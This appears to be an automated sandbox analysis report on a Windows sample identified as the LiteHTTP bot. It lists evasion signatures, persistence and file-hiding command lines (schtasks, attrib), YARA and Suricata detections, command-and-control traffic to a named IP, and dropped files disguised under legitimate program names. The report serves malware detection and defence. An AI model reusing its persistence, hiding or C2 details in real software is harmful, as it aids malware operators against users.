Windows Analysis Report
DQmU06kq9I.exe

Overview

General Information

Sample name: DQmU06kq9I.exe (renamed because original name is a hash value)
Original sample name: d37dab4c59e707f632bb0b91eaa87ff9.exe
Analysis ID: 1576609
MD5: d37dab4c59e707f632bb0b91eaa87ff9
SHA1: 0e153debcf54805a0543646620511b57865d6fc9
SHA256: 375a067be10250dc045ea14025444ad7ec0662cf189abbbd393e6f7ffe85b35d
Tags: exe, user-abuse_ch
Infos:

Detection

LiteHTTP Bot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LiteHTTP Bot
AI detected suspicious sample
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DQmU06kq9I.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: D37DAB4C59E707F632BB0B91EAA87FF9)
    • schtasks.exe (PID: 6448 cmdline: "schtasks" /Query /TN "DQmU06kq9I" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6304 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 1712 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5512 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 4856 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5960 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 6196 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 1516 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5504 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 4224 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2740 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3160 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
  • DQmU06kq9I.exe (PID: 2000 cmdline: C:\Users\user\Desktop\DQmU06kq9I.exe MD5: D37DAB4C59E707F632BB0B91EAA87FF9)
    • schtasks.exe (PID: 6788 cmdline: "schtasks" /Query /TN "DQmU06kq9I" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • DQmU06kq9I.exe (PID: 2680 cmdline: "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: D37DAB4C59E707F632BB0B91EAA87FF9)
    • schtasks.exe (PID: 4512 cmdline: "schtasks" /Query /TN "DQmU06kq9I" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2516 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 712 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3960 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5176 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 516 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2132 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
00000000.00000002.4541067680.0000000000552000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
00000008.00000002.4541316207.0000000000552000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |

Source | Rule | Description | Author | Strings
9.2.DQmU06kq9I.exe.8ba0000.3.unpack | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
9.2.DQmU06kq9I.exe.8ba0000.3.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
9.2.DQmU06kq9I.exe.8ba0000.3.unpack | MALWARE_Win_CoreBot | Detects CoreBot | ditekSHen |
  • 0x8862:$v1_1: newtask
  • 0x7243:$v1_6: payload
  • 0x7446:$v1_7: DownloadFile
  • 0x7453:$v1_8: RemoveFile
  • 0x8814:$cnc1: &os=
  • 0x881e:$cnc2: &pv=
  • 0x8828:$cnc3: &ip=
  • 0x8832:$cnc4: &cn=
  • 0x883c:$cnc5: &lr=
  • 0x8846:$cnc6: &ct=
  • 0x8850:$cnc7: &bv=
  • 0x8872:$cnc8: &op=
  • 0x8880:$cnc9: &td=
  • 0x8894:$cnc10: &uni=
0.2.DQmU06kq9I.exe.550000.0.unpack | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security |
0.2.DQmU06kq9I.exe.550000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

System Summary

Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\DQmU06kq9I.exe, ProcessId: 5440, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnk
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T10:20:19.143774+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49826 | 185.208.159.109 | 80 | TCP
2024-12-17T10:20:36.924933+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49867 | 185.208.159.109 | 80 | TCP
2024-12-17T10:20:56.558753+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49908 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:13.643978+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49948 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:29.722238+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:32.560184+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49980 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:38.143751+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49981 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:44.722069+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49982 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:55.440621+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49983 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:57.144479+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49984 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:12.722386+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49985 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:15.331500+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49986 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:30.612546+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49987 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:31.612580+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49988 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:37.331293+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49989 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:47.518810+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49990 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:56.440691+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49991 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:14.518821+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49992 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:21.638539+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49993 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:24.690730+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49995 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:32.971952+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49996 | 185.208.159.109 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T10:20:19.143774+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49826 | 185.208.159.109 | 80 | TCP
2024-12-17T10:20:36.924933+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49867 | 185.208.159.109 | 80 | TCP
2024-12-17T10:20:56.558753+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49908 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:13.643978+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49948 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:29.722238+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49979 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:32.560184+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49980 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:38.143751+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49981 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:44.722069+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49982 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:55.440621+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49983 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:57.144479+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49984 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:12.722386+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49985 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:15.331500+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49986 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:30.612546+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49987 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:31.612580+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49988 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:37.331293+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49989 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:47.518810+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49990 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:56.440691+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49991 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:14.518821+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49992 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:21.638539+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49993 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:24.690730+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49995 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:32.971952+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49996 | 185.208.159.109 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T10:20:18.128651+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49826 | 185.208.159.109 | 80 | TCP
2024-12-17T10:20:35.925260+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49867 | 185.208.159.109 | 80 | TCP
2024-12-17T10:20:55.472043+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49908 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:12.644070+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49948 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:28.706502+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49979 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:31.550246+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49980 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:37.207748+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49981 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:43.738125+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49982 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:54.362643+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49983 | 185.208.159.109 | 80 | TCP
2024-12-17T10:21:56.034479+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49984 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:11.660045+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49985 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:14.222561+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49986 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:29.597040+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49987 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:30.456639+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49988 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:36.347067+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49989 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:46.487687+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49990 | 185.208.159.109 | 80 | TCP
2024-12-17T10:22:55.472046+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49991 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:13.456404+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49992 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:21.034585+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49993 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:23.706595+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49995 | 185.208.159.109 | 80 | TCP
2024-12-17T10:23:31.987653+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.5 | 49996 | 185.208.159.109 | 80 | TCP

AV Detection

Source: C:\Users\user\OneDrive\autoit3.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\common files.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\google.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\internet explorer.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\java.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\jdownloader.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\microsoft office.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\microsoft.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\microsoft.net.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\msbuild.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\msecache.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\reference assemblies.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\windows defender.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\windows mail.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\windows media player.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\windows multimedia platform.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\windows nt.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\windows photo viewer.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\windows portable devices.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\windows sidebar.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\OneDrive\windowspowershell.exe, ReversingLabs: Detection: 60%
Source: DQmU06kq9I.exe, ReversingLabs: Detection: 60%
Source: DQmU06kq9I.exe, Virustotal: Detection: 34%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\OneDrive\msbuild.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\jdownloader.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\msecache.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\google.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\windows mail.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\common files.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\java.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\windows defender.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\microsoft.net.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\microsoft.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\reference assemblies.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\microsoft office.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\internet explorer.exe, Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\autoit3.exe, Joe Sandbox ML: detected
Source: DQmU06kq9I.exe, Joe Sandbox ML: detected

Bitcoin Miner

Source: DQmU06kq9I.exe, String found in binary or memory: CryptoNight
Source: DQmU06kq9I.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Projects\Anubis-Master\Bot\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49826 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49826 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49867 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49826 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49867 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49867 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49948 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49908 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49908 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49908 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49948 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49948 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49983 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49982 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49983 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49983 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49989 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49982 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49982 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49979 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49989 -> 185.208.159.109:80
